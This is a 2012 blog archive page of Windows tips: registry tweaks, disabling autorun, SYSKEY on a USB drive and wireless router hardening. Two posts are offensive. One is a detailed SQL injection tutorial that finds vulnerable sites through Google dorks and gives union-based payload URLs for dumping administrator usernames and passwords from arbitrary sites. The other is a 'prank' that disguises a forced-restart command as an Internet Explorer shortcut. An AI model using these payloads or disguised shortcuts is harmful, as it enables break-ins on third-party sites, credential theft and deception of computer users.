Thursday, May 03, 2012

Lock Desktop Icons


In this tutorial we’ll see how we can lock our desktop icons so that no one can make any changes to the icons that we have arranged in the desktop. Generally it happens when someone comes to our system and mess up the arrangement.
So for that open Registry and go to the following path

HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer.

Right-click in the right pane and select New, DWORD Value name NoSaveSettings and press the Enter key. Right-click on the new NoSaveSettings item and select Modify. Enter 1 in the Value data box. After this, whenever you restart Windows, your settings will return to their current state.
Read More

How to make a folder with name “con” ?


Folder with Name "con"
Goto command Prompt,
Goto the location where you want to make the folder with name “con”.
write the command:
mkdir \\.\e:\con
To remove the folder again:
rmdir \\.\e:\con
Read More

Display Legal Notice on Startup of your Windows


Hello Friends,
Steps/Tricks  “How to Display Legal Notice on Start up of your Windows”
If your PC has multiple users then you can now display legal notice to every user before they login to your PC. This legal notice will be displayed at every startup just before the Desktop is loaded. Using this you can tell your friends about the do’s and dont’s in your computer when they login in your absence. Well you can do this pretty easily. For this there is one small registry hack. Here is the step-by-step instruction to do this.
1. Go to Start->Run, type regedit and hit ENTER
2. Navigate to the following key in the registry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\policies\system
On the right side pane look for “legalnoticecaption“, double click on it and enter the desired Legal Notice Caption.
3. Next below this look for “legalnoticetext” and enter the desired Legal Notice Text. The legal notice text can be up to a page in it’s size so that it can include a set of do’s and dont’s for your computer.
4. After you do this just restart your computer and upon the next startup you can see the legal notice information for your computer. This trick works on both XP and Vista. You can also try it on Windows 7 and should work with no problems.
Hope you like this post. Pass your comments.
Read More

Shut Down system by double Clicking on Internet Explorer


Double click on Internet explorer to Restart the Computer:
1) Goto Desktop
2) Right click > new > Shortcut
3) In “Type the Location of the item” > write: “C:\WINDOWS\system32\shutdown.exe -r -t 00″ without coutes.
4) Click next and in “Type a name for this shortcut” write ” Internet Explorer” and click Finish.
5) Now Right Click on the shortcut of Internet Explorer and goto “Change Icon” and select the icon of Internet Explorer.
6) Now Virus is Ready… haha.. check it out.. when you will double click on Internet Explorer Shortcut… Computer will Restart.
7) Use this as a Prank… don’t Misuse it.. That’s JUST an Advise.
Read More

Turn Off (Disable) Autorun Feature of All Drives in Windows without Any Tool


Turn Off (Disable) Autorun Feature of All Drives in Windows without Any Tool
CDs, DVDs & PenDrives containing viruses or malwares make use of the AutoRun feature in Windows to infect your computer as soon as they were loaded. AutoRun was introduced with Windows 95 so a CD or DVD that contained a file called autorun.inf would start up when it was loaded in the CD drive.
AutoPlay was added in Windows XP and is also in Windows Vista. AutoPlay brings up a dialog box when any removable media like CDs, external hard drives or USB memory sticks are attached to the computer. The dialog box gives the user a list of possible actions like open as a folder, cancel, autorun a file, and more.
For the computer user who wants to avoid all possible means of having his or her computer infected the safest thing is to turn off autorun or autoplay.
Go with the following simple steps to turn off Autorun in Windows:
1. Go to Start, Click Run & type gpedit.msc and click OK.
2. It will open the Windows Group Policy. Now in the Group Policy, Click Administrative Templates,
  • For Windows XP click on System
  • For Windows Vista, click on System Components, then Autoplay Policies.
Then Double click on Turn Off Autoplay.
3. Now In the Autorun Properties just popped, select Enabled & then select All Drives in the drop down.
Thats it. Now your windows is safe from unexpected viruses & malwares that infect the windows services using the Autorun feature.
Read More

Lock/Unlock Computer With Pendrive


First, what is “syskey”?
SYSKEY is a utility that encrypts the hashed password information in a SAM database in a Windows system using a 128-bit encryption key.
SYSKEY was an optional feature added in Windows NT 4.0 SP3. It was meant to protect against offline password cracking attacks so that the SAM database would still be secure even if someone had a copy of it. However, in December 1999, a security team from Bind  View found a security hole in SYSKEY which indicates that a certain form of cryptanalytic attack is possible offline. A brute force attack then appeared to be possible.
Microsoft later collaborated with Bind View to issue a fix for the problem (dubbed the ‘Syskey Bug’) which appears to have been settled and SYSKEY has been pronounced secure enough to resist brute force attack.
According to Todd Sabin of the Bind View team RAZOR, the pre-RC3 versions of Windows 2000 were also affected.
So this is pretty cool, right?  Well, I really like the idea of keeping this on Floppy so that it requires a floppy disk (a sort of 2 factor (hardware/software) authentication?).
Naturally I wanted to go a bit further and use this on a USB drive instead of storing to a Floppy.  I can’t see myself carrying a floppy and a USB floppy drive around with me.  After all, this provides another layer of security.
NOTE:  I haven’t tested copying data from 1 USB to another USB to see if it works as a backup.  This way you could lock up a USB drive as a spare if needed.
Here’s how to get this to work using a USB drive.
1.  Insert your USB drive into your system and wait for it to be recognized and install any necessary drivers.
2.  Fire up disk management and re-assign the drive letter it was given to “A”.

Start up disk management by clicking Start and typing diskmgmt.msc


Right-click the USB drive and choose to assign driver letter or path.

Assign it to letter “A”

Accept the warning message

Now your USB drive is “A”

3.  Run Syskey and save encryption to USB Drive “A”

Click Start and type syskey followed by hitting Enter

Syskey launched; Click “Update”

Choose “Store Startup key on floppy disk” and click “OK”

You’ll be prompted to enter your diskette. Make sure your USB drive is inserted and writable.
4.  Reboot and have fun.  Don’t lose your USB disk!  Also, to revert this, you can run syskey again and choose to store it locally instead of “on a floppy disk”.
Read More

Convert Text Message to Voice Message without using any Tool


Today I have something good for you and i.e convert text message to voice. By following these steps you can convert the text message to voice message.

Step1:Open the Notepad from Start>All Programs> Accessories.
Step2:Then copy-paste the following code in the text area.
Dim msg, sapi
msg=InputBox(“Enter your text for conversion: For Ex. Kyrion.”,”Kyrion.in: Text2Speech Converter”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak msg
Step3:Open File>Save as
Step4:Then in the Save As dialog box enter any name for the file with the extension .vbs and click on Save.

Step5:Then open the file that you had saved.
Step6:Enter the text which you want to convert to speech.

Step7:Click on OK button.
Now you will see the pure magic of Windows. After the Dialog box closes you will here what you had actually typed in the dialog box to  Convert Text Into Speech In Windows  by using notepad. You will be thrilled to know that your text has be converted in to speech.

Read More

URL Based SQL Injection


Introduction: SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution.
Finding Sites: When talking to find a vulnerable site for SQL Injection you will hear the term Dork a lot, this refers to a google search term targeted at finding vulnerable websites. An example of a google dork is inurl:index.php?id=, entering this string in google search engine would return all sites from google cache with the string news.php?id= in their URL.
Ex:
http://www.site.com/news.php?id=4
To be a SQL injection vulnerable a site has to have a GET parameter in the URL.
In http://www.site.com/news.php?id=4, id=4 is the GET parameter as it is getting the id=4 from the backend database.
Checking Vulnerability: To check if the site is vulnerable to SQLi the most common way is to just add an apostrophe( ‘ ) after one of the parameter in the URL.
Ex:
http://www.site.com/news.php?id=4′
Now if the site is vulnerable it will show error like:
You have an error in your SQL Syntax
Warning: mysql_num_rows()
Warning: mysql_fetch_assoc()
Warning: mysql_result()
Warning: mysql_fetch_array()
Warning: mysql_numrows()
Warning: mysql_preg_match()
If you see any of these errors when entering ‘ after the number or string of parameter then the chances are the site is vulnerable to SQLi attacks to some extent. Although that is not the only way to know if the site is vulnerable to SQLi attacks, an error can be in form of when a part of the site is just simply disappears such as a news article, body text or images. If this happens then the site is vulnerable also.
Finding number of columns: After you find that the site is vulnerable the next step is to find the number of columns in the table that is in use. There are couple of ways to do this like ORDER BY or GROUP BY. Here I will use ORDER BY To find the number of columns start with ORDER BY 1.
Ex.
http://www.site.com/news.php?id=4 ORDER BY 1–
If it doesn’t error then probably you can use ORDER BY command. Sometimes you will get error on doing ORDER BY 1, if it gives error then simple move on to other site. If it doesn’t error then I always go to ORDER BY 10000 (because a table can’t have 10000 columns in it) to see if it give error.
Ex.
http://www.site.com/news.php?id=4 ORDER BY 10000–
Sometimes it doesn’t error as it should, then I use AND 1=0 before the ORDER BY query to get an error.
Ex.
http://www.site.com/news.php?id=4 AND 1=0 ORDER BY 10000–
After getting the error on 10000 its up to you how you find the number of columns, I start with 100 and divide the no of columns by 2 until i get closer. Something like this:
http://www.site.com/news.php?id=4 ORDER BY 100–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 50–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 25–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 12–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 6–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 3–
NO ERROR
As 6 is giving error and 3 is not the number of columns is either 3, 4 or 5.
http://www.site.com/news.php?id=4 ORDER BY 4–
NO ERROR
http://www.site.com/news.php?id=4 ORDER BY 5–
ERROR
After this you can conclude that the website has 4 columns as it gives error above ORDER BY 4 and doesn’t error below ORDER BY 4.
NOTE: Comments are not necessary every time when injecting a website, although sometimes they are. Possible comments to use are:

/*
/**/
#
Getting MySQL version: This is an important step because if the MySQL version is lower than 5 then we have to guess the name of the tables and columns to inject which is sometimes get frustrating so I would recommend to work on version 5 for beginners. Before finding the version of the column we have to find the visible column number to inject our query to get result. To do this we will use the SELECT statement and UNION ALL statement.
http://www.site.com/news.php?id=4 UNION ALL SELECT 1,2,3,4–
It will return numbers back in data place, if it doesn’t then add a negative sign after the equals sign, put a null in place of the number after the equal sign or add AND 1=0 before the UNION query.
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,3,4–
http://www.site.com/news.php?id=null UNION ALL SELECT 1,2,3,4–
http://www.site.com/news.php?id=4 AND 1=0 UNION ALL SELECT 1,2,3,4–
Now say we got back the number 3, so this is the column that we can retrieve data from. To get the database version there are two ways either version() or @@version, let’s use them:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(version()),4–
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(@@version),4–
If you get an error like “Illegal mix of coallations when using @@version“, then you have to convert it into latin from UTF8 as:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(@@version using latin1),4–
NOTE: We are completely replacing the number 3 with our query, something like 1,2,group_concat(@@version),3,4– will result in error.
If it worked you will get the version of MySQL. You will see something like 5.0.45, 5.0.13-log, 4.0.0.1 etc. All we need to focus is on the first number,i.e., 4 or 5. If it is 5 then keep going but if it is 4 and you are new then you should move on to other website because we have to guess the table names in order to extract the data.
NOTE: Sometime you will get frustrated by knowing that you spent 5-10 minutes in just getting the database version after applying the ORDER BY, UNION SELECT and version() in queries and the result is MySQL4. So to save my time in getting the database version, I use the Inferential(Blind SQL Injection) to get the version of the MySQL. Do as follows:
http://www.site.com/news.php?id=4 AND 1=1–
NO ERROR
http://www.site.com/news.php?id=4 AND 1=2–
ERROR
http://www.site.com/news.php?id=4 AND substring(@@version,1,1)=4–
If page come back true then the version is 4.
http://www.site.com/news.php?id=4 AND substring(@@version,1,1)=5–
If page come back true then the version is 5.
If version is 5 then you can start ORDER BY and continue because you already know that the version is 5 and you will not have to guess the table names. Although I would recommend that beginners should use ORDER BY.
GETTING NAME OF DATABASES: Getting databases name is very important because sometimes the current database the webpage is running does not contains useful informations such as username and passwords. So it is good to have a look at all the databases. In MySQL version 5 or higher there is always a database named ‘information_schema’ which make SQL injection easier. To get the list of the databases use this:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(schema_name),4 from information_schema.schemata–
now you will get the name of all the databases at the same position where you saw the version of MySQL before.
Ex: information_schema,db_site,db_main
To know which database you are working upon use database() in the query as:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(database()),4–
Now you will get the current database. Ex: db_site
To know the current user of database use user(), although its not necessary but its good to know.
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(user()),4–
Now you should get the current user of database. Ex: user@localhost.
To save your time you can use a query to display version, current database and user all at once as:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(version(),0x3a,database(),0x3a,user()),4–
or
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,CONCAT_WS(CHAR(32,58,32),version(),database(),user()),4–
Getting Table Names: It is good habit to check the table name of all the databases because sometimes the current database does not contains useful information.
To get the table names of current database:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(table_name),4 from information_scheme.tables where table_schema=database()–
Assume it gave you the following names of the tables contains in the current database(in our example db_site).
Ex. News, Gallery, Games etc.
As you can see it is not looks useful, so get the table names of other database(in our example db_main), but to do so you have to encode the name of the database in hexadecimal form and put ’0x’ in front of the encoded hexed name to tell the database that it is hex encoded and and it need to be decoded it to get the right name. In our example we need to get the table name of database ‘db_main’ after encoding it to hex it is equivalent to ’64625f6d61696e’. To get the table names of the database ‘db_main’:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x64625f6d61696e–
It will give you the name of all tables in the database ‘db_main’.
Ex: newsletters, posts, Administrator
Now we can see that this is a good stuff.
NOTE: Online Text to Hex converter: http://www.swingnote.com/tools/texttohex.php
Getting Column Names: Now to extract data from table Administrator we need to find the columns in it. To get this you would do:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x41646d696e6973747261746f72–
NOTE: We replace ‘information_schema.tables‘ with ‘information_schema.columns‘ and ‘table_schema‘ with ‘table_name‘. Again we encoded ‘Administrator’ in Hex to get our query work.
Now you should see the column names.
Ex: Id,Username,Password
Now to extract data from columns ‘Id,Username,Password‘ of table ‘Administrator‘ of database ‘db_main‘, you would do:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(CONCAT_WS(CHAR(32,58,32),Id,Username,Password)) from db_main.Administrator–
Sometimes it will not work then you have to encode ‘db_main.Administrator‘ into hex:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(CONCAT_WS(CHAR(32,58,32),Id,Username,Password)) from 0x64625f6d61696e2e41646d696e6973747261746f72–
Now you will get what you were looking for.
If you find that I have written something that is wrong, please address it and I will fix it. :)
Read More

Wireless Network Hardening


This is the tutorial for securing your AP/Routers.
Threats to Wi-Fi Implementations
Radio waves can penetrate through walls there is a great chance of unauthorized access to the network and data. Because of its broadcasting nature, anybody can sniff the network for valuable credentials. If the network is not properly secured the attacker will get sufficient data to launch an attack.
In brief the following cases may happen.
i) The attacker may search for available wireless networks in the close proximity. If the Access Point( AP) is open the attacker can avail the network without any effort.
ii) The attacker can directly log in to the Access Point using default credentials and configure the device in whatever way he wants.
iii) The attacker can sniff the network for configuration details such as SSID(Service Set Identifier) , BSSID(Basic Service Set Identification ), encryption used, channel used etc. He can capture sufficient packets to launch an attack.
iv) The attacker can install a fake Access Point and lure(like advertising free internet access) users to connect to the rogue AP.
v) The attacker can disrupt the normal functioning of the network.

Securing AP/ Router
As far as a user is concerned, securing Access Point ensures the primary level of security. In this document configuration settings of an AP/Router that is installed in a typical home network is discussed. We have used ‘Linksys’ WAP 54G and ‘beetel’ Router for this purpose. The configuration settings as explained below will secure the AP.
1.       Change Administrator Password
An attacker can easily find out the default password. It must be changed. Ensure that the admin password is strong enough.
Password editing interface of Administrator

2.       Prefer Wi-Fi Protected Access(WPA2 Preferably) instead of Wired Equivalent Privacy(WEP).
WPA’s salient features are strong encryption algorithm, user authentication and support for IEEE 802.1X . Use Wi-Fi Protected Access (WPA) or WPA2 with Pre-Shared Key (PSK) authentication and AES as the encryption standard. The pass phrase should be strong enough.

Interface for configuring Security Mode.

3.       MAC Address Filtering
Access of the clients can be permitted or prevented by providing a list of MAC Addresses in the “MAC Address filter” configuration parameter. This is known as MAC Address filtering. Together with SSID this can also used as a security measure. Select the MAC Address of all the wireless Network interface cards used in the network. The list can be used to permit or prevent the wireless access .
Configuring MAC filter

4.  Best Practices
There are certain best practices explained below which should be followed for enhancing security of wireless Access Point / Routers.
i) Restrict the Access
SSID (Service Set Identifier) is used to identify a wireless network which a user wants to attach. All wireless devices that want to communicate on the WLAN need to have their SSID set to the same string as the AP. Even though the attacker can get the SSID simply by sniffing the network it is preferable to change the default SSID. Avoid SSID which shows name or other information. Name the access point such that it can be easily traceable during trouble shooting. Physical security of access point is also important.
ii) Disable Management via Wireless
It is recommended to disable management of the router via wireless devices associated with the access point. If someone manages to associate with the access point and login to the router , they can change the configuration of the router. Prefer wired interface with AP/Router to configure the device.
iii) Disable Remote Management
Remote Router Access permits web-based management of the wireless router from external networks such as the Internet. By default this feature opens port 8080/TCP on the external side of the router. This feature provides significant risk to the device, permitting an attack vector and more importantly significant risk to internal network. It should be disabled unless remote management is absolutely required. Universal Plug and Play may also be disabled.
iv) Turn off the AP when not in use
This is also advisable since it minimizes the risk of unauthorized access.
v) Configure Network Mode
Select the wireless mode which is depending upon the protocols. The possible options are.
_ Disabled – disables AP.
_ Mixed – permits both 802.11 b and 802.11g.
_ B-Only – 8.2.11 b only.
_ G-Only – 8.2.11 g only.
vi) Disable SSID Broadcast.
This can protect the AP from a naive attacker . By disabling SSID broadcast, the easy availability of SSID can be restricted. But the attacker can still sniff the SSID from frames that devices use when associating with an AP. According to some vendors disabling SSID broadcast may restrict or invite the chance of exploitation.
vii) Set Wireless Channel from default
Changing the default wireless channel used by the AP is a good practice.It may avoid automatic association of the wireless interface to the network.
viii ) Maximize the Beacon Interval
Beacon frames are used for connection establishment and management by IEEE 802.11 networks. These frames from AP to wireless clients ,transmitted at regular intervals are used for configuration matching. It is recommended to set the beacon interval to the maximum number. This will reduce the transmission frequency of SSID so that the attacker will get less number of opportunities to sniff the beacons containing SSID. But there is a problem here. The attacker can probe the network using some specific SSID which is known as active scanning.
ix) Prefer Static IP instead of DHCP.
Since DHCP is automatically assigning IP addresses, an attacker can utilize this feature to get an IP. So it is recommended to use static IP on wireless networks.
 Configuring Static IP
Read More